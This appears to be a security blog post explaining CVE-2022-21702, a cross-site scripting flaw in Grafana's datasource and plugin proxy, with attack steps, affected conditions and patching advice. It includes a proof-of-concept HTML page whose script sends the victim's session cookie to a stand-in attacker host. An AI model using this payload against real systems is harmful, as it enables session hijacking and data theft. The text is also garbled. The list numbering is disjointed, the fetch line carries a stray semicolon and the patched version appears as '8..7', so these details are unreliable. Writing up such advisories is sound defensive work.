CVE-2022-21702 - How XSS in Grafana Data Sources and Plugins Puts Your Monitoring Data at Risk

Grafana is an open-source platform that powers dashboards, analytics, and monitoring for countless organizations. But as with any software, vulnerabilities do appear—and in 2022, a particularly dangerous Cross-site Scripting (XSS) bug emerged in how Grafana handles plugin and datasource proxying. Understanding how this flaw works will help you protect your data and users.  
Let’s break it down step-by-step, with simple language, examples, and practical advice.

What is CVE-2022-21702?

CVE-2022-21702 is a Cross-site Scripting (XSS) vulnerability affecting Grafana. It lets attackers trick authenticated users into running malicious JavaScript code by abusing Grafana’s proxy functionality for HTTP-based datasources and plugins.

Who Is at Risk?

- Any Grafana instance with HTTP-based datasources or plugins configured with “Server” as Access Mode.

Users with access to these datasources or plugins.

- Only exposed if a user is lured into clicking a specially-crafted link—an attacker needs some social engineering.

Conditions

- A datasource (e.g., InfluxDB, Prometheus) is set up to use a specific external HTTP URL, with Server access mode.

Attack Steps

- The attacker sets up a malicious HTTP server serving crafted HTML/JS payload.
- The victim (an authenticated user) is tricked into clicking a crafted Grafana link that proxies traffic to the attacker’s server.
- The attacker’s server responds with HTML/JS, which gets executed in the context of the Grafana instance, stealing session cookies or sensitive data.

1. Attacker controls: http://evil.example.com/fake-datasource
2. Admin configures Grafana datasource: URL = http://evil.example.com/fake-datasource, Access mode: Server
3. User clicks: 
https://grafana.example.com/datasources/proxy/99/?evilPayload
4. Attacker’s server responds with XSS payload

- User is tricked into visiting a URL in the format

/api/plugins/<plugin-id>/resources/<path_to_evil_content>

3. Backend Plugin Resource Route

- If a backend plugin’s resource handler is compromised, a crafted link could allow similar malicious payloads.

Here’s a minimal proof-of-concept payload that an attacker-controlled HTTP server might return

<!-- evil.html, hosted on attacker's server -->
<html>
  <body>
    <script>
      // Exfiltrate user's Grafana session token, for demo ONLY!
      fetch("https://evil.example.com/steal?cookie="; + document.cookie);
    </script>
    <h1>You have been hacked!</h1>
  </body>
</html>

If Grafana does not sanitize the content, and a user is tricked into clicking a link proxying this content via Grafana’s own domain, their browser executes the code with their user session.

Can This Be Fixed Without Patch?

No. Grafana has not provided any reliable workaround. Security headers and CSP may help, but they’re not enough. Only updating to patched Grafana versions solves the problem.

Upgrade!

Patch your Grafana to at least versions listed in Grafana's security advisory:

8..7

- Review Datasource/Plugin Settings:  
 Only use trusted data sources and plugins. Don’t point plugins or datasources to untrusted HTTP endpoints.

References

- Official Grafana advisory for CVE-2022-21702
- NIST NVD CVE entry
- Grafana Release Notes

In Summary

CVE-2022-21702 is a sobering reminder that even your monitoring tools need attention. If they’re vulnerable, so is your wider infrastructure. Update your Grafana now, never point datasources or plugins at untrusted sources, and protect your users from deceptive links.

If you need more technical assistance or have custom setups, always consult with the Grafana community or security team!

Timeline

Published on: 02/08/2022 20:15:00 UTC
Last modified on: 05/07/2022 08:15:00 UTC